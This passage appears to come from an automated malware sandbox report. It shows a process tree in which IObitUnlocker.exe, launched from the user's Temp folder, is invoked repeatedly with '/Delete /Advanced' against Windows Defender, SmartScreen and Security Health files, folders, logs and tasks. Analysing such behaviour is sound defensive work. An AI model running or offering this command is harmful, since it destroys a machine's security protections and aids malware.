                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
